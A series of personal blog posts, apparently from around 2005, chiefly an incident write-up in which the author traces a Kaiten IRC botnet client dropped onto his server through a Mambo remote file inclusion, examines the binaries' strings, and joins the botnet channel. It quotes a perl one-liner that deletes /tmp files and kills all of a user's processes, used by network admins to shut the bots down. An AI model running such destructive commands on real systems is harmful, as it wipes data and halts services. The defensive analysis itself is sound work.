Posted by Tim
Filed under: Geek
22C3 0001 - Hacker
From the German Schneider Buch Computerlexikon (1984):
Hacker werden Personen genannt, die den Computercode, d.h. den Zugriff auf gespeicherte Informationen fremder Rechner, durch "Rumhacken" auf der Tastatur knacken. Sie benutzen dazu ihren Computer und ein Telefon mit Modem. So können sie Daten von ihrem Computer aus über das Telefonnetz in einen anderen Computer übertragen und Daten von ihm abrufen. Dieses "Einschleichen" ist ein neues Hobby, vor allem von Jugendlichen in den USA. Sie schließen sich zu Banden zusammen, um organisiert Daten von Großcomputern abzurufen. Im vergangenen Jahr passierten mindestens drei aufsehenerregende Fälle im Bereich der Computerkriminalität.
So happy hacking at 22C3!
Posted by Tim
Filed under: Geek
Tracking a worm's origin
About a week ago I discovered that a server was consuming a lot of CPU power. Usually it's almost idle all the time so I had a look. There were some strange processes running on the machine. Looking in the /proc file system I saw that these programs were running from /tmp as user apache - someone came through
the webserver. I killed the processes and saved the files to another directory. Since I was short in time I decided to have a closer look later.
Of course I didn't as I should. Two days later the same processes were back again. Note to myself: Do the work when it needs to be done. Since I didn't
do this right away now was the time for a night shift.
I killed the processes again. Saved the files to another directory and cleaned up in general. Since I run a tripwire on that machine I was confident that no other files were changed - it didn't fire and all created files were still owned by apache, not by root as you see it occasionally if someone really breaks in. So I decided not to reinstall the whole machine but just have a look and stuff the hole.
So to find out were the intruder came from I decided to analyse the binaries I found. I started with the files from the second intrusion. Two binaries were running, one called d, the other called qs. There was another file called mirela that contained a simple script with two wget calls to download d and qs. This request was done from an IP with no reverse lookup - so I decided to look further before contacting the ISP.
The first thing was easy: Have a look at all the strings in the binary. The tool strings from the binutils can do that in an easy manner. The output of qs looked more promising:
[...]
us.undernet.org
eu.undernet.org
NOTICE %s :Unable to comply.
/usr/dict/words
%s : USERID : UNIX : %s
NOTICE %s :GET
NOTICE %s :Unable to create socket.
[...]
NOTICE %s :Kaiten wa goraku
[...]
bash-
#debilii
debilu
NICK %s
USER %s localhost localhost :%s
ERROR
The Kaiten string looked easy enough to be googleable - in fact it took me to packet storm. Keaten happens to be an IRC based distributed denial of service client. After reading a little bit it and googling it was clear that it is a client that will connect to a given channel and password and await commands. So the next task was to find out the channel an password to connect to.
Looking further in the strings output revealed that someone was really dumb. He used the code as-is. In the end of the file the CHAN and KEY defines are assigned to a variable and thus will appear late in the output. This was the explanation - in fact you just look in the output and take the only line with a hash as the channel. The similarity makes it easy to guess that the next line contains the password even without knowing the code...
So I fired up my IRC client and connected to undernet which the lines in the beginning of the interesting output revealed. I joined the channel and saw quite a few of these drones in the channel and two users which looked "real". The channel was moderated so there was not really anything I could do.
I decided to analyse the first attack. I turned out that this attack used another channel and password. So I joined that one and was surprised, no bots, just a few IRC ops from the network. I immediately got a message
!junknick SH perl -e 'unlink ; for (1..99999) { kill 9, $_ unless $_ eq $$ }'
which would ordere a bot to delete all files in /tmp and kill all processes of the user the process is running as without the perl "killer" itself. This should shutdown the bot without too much hassle (it turned out that the admins already knew how the attackers got in). I just answered "Boo!" to this user. This made them curious and after I told them how I got here we talked on the old now-closed channel about how I came there and what there findings were.
I told them about the other channel I had found earlier. Immediately they joined that channel and cleaned it up by sending the mentioned command to all bots on the channel and de-oping the "real" users on the channel. An epic battle against the still-joining bots.
During this I had a nice talk to one of these cleanup admins - poor guy. His job
was to cleanup someone else's mess. It turned out that they already found the script kiddie who caused that trouble. He had been selling the boxes to other kiddies for flooding other users...
They told me that they probably came into the system through either Webalizer or Mambo. Since I have no Webalizer actively running on the system it had to be Mambo. I don't use it for my own pages but my brother and I were evaluating it for a new client and had a test installation which had not even a publicly known URL. I should have read one of these before... Hopefully Joomla will work better.
So I had a closer look at the Apache error_log file - and I found it. They were calling a Mambo file with invalid variables set. Basically they set the absolute path to the config to an HTTP URL which would start the download of the mirela file - which would then download d and qs and start these.
So after all it turned out that the first assumption, that no other system files were harmed, was true. I removed the Mambo test installations and can be sure that this fixed the problem.
Tracking down the problem in the first place was worth the effort to know what had happend and to sleep good withtou re-installing the machine.
Posted by Tim
Filed under: News
10^6
One million page requests - even with the 2147483647 bytes maship - taking that into account with an average I made it more than a month earlier than last year :-) This posting is just for my ego. Go on, nothing to see here.
Posted by Tim
Filed under: Personal
It's gone
Today I sold my table football. It was quite some fun playing it but since Buck left for a year to sweden a couple of months ago there almost nobody here to play. Now it's gone. Time for a nice arm chair to fill the place again.
I guess for the log I should mention that I have been in hospital - again. I had to stay for three days. This time it was a acetylsalicylic acid induced gastritis - after taying a third of the nominal dosis. No fun, don't try that at home kids! Got some pain killers. Didn't boost my health up to 100 immediately. But Burger King jumped in and solved that - about five days later. About one hour after I had a chicken burger menu the pain vanished - within minutes. Strange. Don't want to know what they put into this stuff. Now I'm fine again. Note to myself: Throw away that green shit.
Posted by Tim
Filed under: News
Floating mind
I'm sitting here in my room, hacking a little bit on NetworkManager. Listening to the Lord of the Rings soundtrack makes my mind float around. I'm thinking about our trip to Scotland in August. It was a great time and it's already that far away. I guess the weather is not as nice as I remember it, but still I would like to be there again - trekking with just Anne and a tent walking through glens and along lochs.
